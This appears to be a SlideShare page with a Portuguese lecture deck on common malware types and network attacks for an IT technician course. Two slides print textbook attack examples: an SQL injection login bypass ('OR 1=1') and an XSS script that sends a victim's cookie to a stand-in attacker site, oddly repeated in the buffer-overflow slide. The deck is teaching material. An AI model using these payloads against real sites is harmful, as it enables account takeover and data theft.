Técnico de Manutenção e Suporte em InformáticaDisciplina - Segurança da InformaçãoUnidade 2 – Malwares e Ataques mais comu...
Malwares
Malwares = Software Maliciosos                                    Cavalo   Vírus     Bot      Backdoors       de          ...
VírusTrecho de código, geralmente em assembler, queé injetado dentro de outro aplicativoModo de Operação: necessidade de u...
KeyloggerAplicativo voltado para capturar tudo o que se édigitado no tecladoModo de Operação: aplicativo captura tudo que ...
WormAplicativo que realiza escaneamentos na rede embusca de hosts vulneráveis. Não necessita da açãodo usuárioModo de Oper...
BotRobô, que possui funcionalidades de worms, e ficaaguardando a ordem do seu mestre para realizarataques a outros computa...
RootKitAplicativo que têm como finalidade permitiracesso privilegiado a um invasor, escondendoseus rastrosModo de Operação...
BackdoorAplicativo que têm como finalidade permitiracesso remoto através da abertura não autorizadade uma portaModo de Ope...
SpywaresAplicativo que têm como finalidade coletarinformações estatísticas dos hosts e enviá-las aoatacanteModo de Operaçã...
Cavalo de TróiaPresente de grego camuflado em arquivos comofotos, cartões virtuas, jogos,... que tem funçõesdestrutivasMod...
AtaquesAplicação        Sql Injection     XSS                   Buffer OverflowTransporte    TCP SYN FLOOD UDP FLOOD      ...
SQL Injection        Ex : Sistema de autenticação em PHPImagine se o usuário inserir os dados abaixo...Login: qualquer coi...
XSSSuposição:Facebook vulnerável a Cross-Site Scripting                                                                   ...
Buffer Overflowchar nome[4];                                           int idade;  L      E             O 0               ...
TCP SYN FLOOD       SYN    SYN-ACK       ACK       SYN       SYN       SYN       SYN       SYN       SYN
UDP FLOOD UDP – porta qualquer UDP – porta qualquer UDP – porta qualquer UDP – porta qualquer UDP – porta qualquer UDP – p...
Main in the Middle    Packet                      Packet                               Packet             Packet
IP Spoofing           Packet                                        Packet10.0.0.1                                        ...
ICMP Flooding   ICMP – echo request   ICMP – echo request   ICMP – echo request   ICMP – echo request   ICMP – echo reques...
Spanning Tree Attack                                                     Packet           Packet                          ...
ARP Spoofing                        Packet                                                    PacketIP: 10.0.0.1MAC:      ...
ARP PoisoningIP: 10.0.0.1MAC:68:A3:C4:9B:73:54                               1   MAC                    IP: 10.0.0.254    ...
MAC Spoofing                     Packet                                                Packet68:A3:C4:9B:73:54            ...
Upcoming SlideShare
Loading in …5
×

Unidade 2 malwares e ataques

470 views

Published on

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
470
On SlideShare
0
From Embeds
0
Number of Embeds
4
Actions
Shares
0
Downloads
12
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Unidade 2 malwares e ataques

  1. 1. Técnico de Manutenção e Suporte em InformáticaDisciplina - Segurança da InformaçãoUnidade 2 – Malwares e Ataques mais comuns Prof. Leandro Cavalcanti de Almeida lcavalcanti.almeida@gmail.com @leandrocalmeida
  2. 2. Malwares
  3. 3. Malwares = Software Maliciosos Cavalo Vírus Bot Backdoors de Tróia Worms Rootkits Spywares Keylogger
  4. 4. VírusTrecho de código, geralmente em assembler, queé injetado dentro de outro aplicativoModo de Operação: necessidade de um códigohospedeiro para sobreviver e replicar. Necessitada ação do usuário Vírus
  5. 5. KeyloggerAplicativo voltado para capturar tudo o que se édigitado no tecladoModo de Operação: aplicativo captura tudo que édigitado e envia de tempos em tempos para oatacante Keylogger
  6. 6. WormAplicativo que realiza escaneamentos na rede embusca de hosts vulneráveis. Não necessita da açãodo usuárioModo de Operação: Se instala e replica entrehosts na rede de forma cíclica Worms
  7. 7. BotRobô, que possui funcionalidades de worms, e ficaaguardando a ordem do seu mestre para realizarataques a outros computadoresModo de Operação: Após o comando do mestrerealiza um DoS em algum outro host na rede Bot
  8. 8. RootKitAplicativo que têm como finalidade permitiracesso privilegiado a um invasor, escondendoseus rastrosModo de Operação: Geralmente se camufla emoutros processos do sistema e abre umabackdoor para acessos remotos nãoautorizados Rootkits
  9. 9. BackdoorAplicativo que têm como finalidade permitiracesso remoto através da abertura não autorizadade uma portaModo de Operação: Geralmente habilitam umaporta alta para acessos não autorizados Backdoors
  10. 10. SpywaresAplicativo que têm como finalidade coletarinformações estatísticas dos hosts e enviá-las aoatacanteModo de Operação: Monitoram processos econexões de rede e enviam essasinformações so atacante Spywares
  11. 11. Cavalo de TróiaPresente de grego camuflado em arquivos comofotos, cartões virtuas, jogos,... que tem funçõesdestrutivasModo de Operação: após a vítima baixar o“presente” o trojan instala outro Malware Cavalo de Tróia
  12. 12. AtaquesAplicação Sql Injection XSS Buffer OverflowTransporte TCP SYN FLOOD UDP FLOOD Main in the Middle Rede IP Spoofing ICMP Flooding STP Attack Enlace ARP Spoofing ARP Poisoning Físico MAC Spoofing
  13. 13. SQL Injection Ex : Sistema de autenticação em PHPImagine se o usuário inserir os dados abaixo...Login: qualquer coisaSenha: OR 1=1SELECT * FROM usuarios WHERE login=qualquer coisa AND senha = OR 1=1 Essa query SQL retornará todos os registros da tabela usuários!
  14. 14. XSSSuposição:Facebook vulnerável a Cross-Site Scripting Usuário ingênuo clica no link... <script> Document.location = http://sitedocracker.com/roubarcokkies.php= + document.cookie </script>Insere um código(html, Javascript,...) malicioso no lugar de um post nabase de dados do facebook
  15. 15. Buffer Overflowchar nome[4]; int idade; L E O 0 2 0Entrada: LEO idade: 20char nome[4]; int idade; L E O O A 0 <script> Document.location = http://sitedocracker.com/roubarcokkies.php= + document.cookie </script>Entrada: LEOOA idade: 65
  16. 16. TCP SYN FLOOD SYN SYN-ACK ACK SYN SYN SYN SYN SYN SYN
  17. 17. UDP FLOOD UDP – porta qualquer UDP – porta qualquer UDP – porta qualquer UDP – porta qualquer UDP – porta qualquer UDP – porta qualquer
  18. 18. Main in the Middle Packet Packet Packet Packet
  19. 19. IP Spoofing Packet Packet10.0.0.1 Packet Packet 10.0.0.254 Packet Packet Atacante envia pacotes IP falsificados para a vítima, se passando por outro host na10.0.0.1 rede!
  20. 20. ICMP Flooding ICMP – echo request ICMP – echo request ICMP – echo request ICMP – echo request ICMP – echo request ICMP – echo request
  21. 21. Spanning Tree Attack Packet Packet VLAN 2VLAN 1 PacketPacket Packet Packet Packet Packet Packet Atacante se torna Root bridge Packet Packet VLAN 1 Packet Packet VLAN 1 VLAN 3 VLAN 1 VLAN 2 VLAN 2
  22. 22. ARP Spoofing Packet PacketIP: 10.0.0.1MAC: Packet68:A3:C4:9B:73:54 IP: 10.0.0.254 Packet MAC: 52:54:00:69:42:4A arpspoof Packet Packet Atacante envia pacotes ARP falsificadosIP: 10.0.0.2 para a vítima, se passando por outro hostMAC: na rede!68:A3:C4:9B:73:54
  23. 23. ARP PoisoningIP: 10.0.0.1MAC:68:A3:C4:9B:73:54 1 MAC IP: 10.0.0.254 2 MAC MAC: 52:54:00:69:42:4A Packet 3 MAC 4 MAC 5 MAC 6 MAC Atacante envenena a tabela ARP do SwitchIP: 10.0.0.2MAC: 68:A3:C4:9B:73:54
  24. 24. MAC Spoofing Packet Packet68:A3:C4:9B:73:54 Packet 52:54:00:69:42:4A Packet Packet Atacante envia pacotes com endereço MAC falsificado para a vítima, se passando por68:A3:C4:9B:73:54 outro host na rede!

×